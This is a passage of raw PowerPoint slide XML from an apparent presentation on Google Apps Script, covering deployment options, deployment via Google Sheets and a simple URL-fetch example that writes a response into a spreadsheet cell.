            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CF91F9D-F52D-F46F-B372-3645A9102C35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>10/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36CEF686-8157-FBDB-CF68-C920DFA22836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="806335" y="1562535"/>
            <a:ext cx="7531330" cy="3334744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1708227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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> GAS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3CA2C7-2305-D825-41A9-DC84F3CBC5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="8348013" cy="2722865"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Several configuration choices for deployment:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>Web application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>deploy a standalone web application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>API Executable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>deploy an Apps Script as an API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Add-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: deploy an Apps Script as a Google Workspace add-on (shared on Google Workspace Marketplace)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>: share code across multiple Apps Script projects (distributed via a script ID)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4CEBFA1-8A9F-C779-0756-A2058F03AC46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>11/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78354D33-223A-A567-AB97-36EE44B398DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461476" y="3137334"/>
            <a:ext cx="2620021" cy="1237541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1DFBE9C-EE9E-8AE9-0FAF-CED49438F499}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4655471" y="2512638"/>
            <a:ext cx="3240247" cy="2518283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="834222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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> GAS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F873F76-E38A-FEE9-0DE3-B4E5C1A13E2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2484516" y="1744841"/>
            <a:ext cx="4174968" cy="3254020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48983DEE-36C9-21FD-073B-232E602498D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="8063200" cy="642043"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>A specific URL (with a unique id) is generated by the Google Apps Script service:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A538B98F-B230-D248-EB72-BFEECD98BB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>12/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2963058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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> GAS via Google Sheets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3CA2C7-2305-D825-41A9-DC84F3CBC5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="7729571" cy="642043"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>It is also possible to deploy an Apps Script directly on Google applications like Google Sheets:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Image 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{219D5310-AFF4-8170-A90F-F3F10DFBBB80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200150" y="1832747"/>
            <a:ext cx="6743700" cy="1539104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB823991-32DC-6E3F-DF5C-4A04FB78B571}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>13/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1382378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Simple script to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> a URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2DE0B0C-8DA7-A72A-F5E5-568080A2E245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="7164825" cy="942081"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Create a request on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.grehack.fr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Retrieve response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Get the results on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>A1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> cell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1931EBE1-4281-EBB3-67A5-5312926F09FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>14/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBD2082C-97BA-B78C-5FBF-36A0E1B06310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="243441" y="2250827"/>
            <a:ext cx="6312928" cy="2487270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B72FA474-E2CD-668C-AA8E-414DE34EFE41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505590" y="2508366"/>
            <a:ext cx="4135490" cy="2570710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2791408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2" y="100824"/>
            <a:ext cx="4809097"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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Useful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>functions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> for Web Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3CA2C7-2305-D825-41A9-DC84F3CBC5C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="8407974" cy="3509849"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
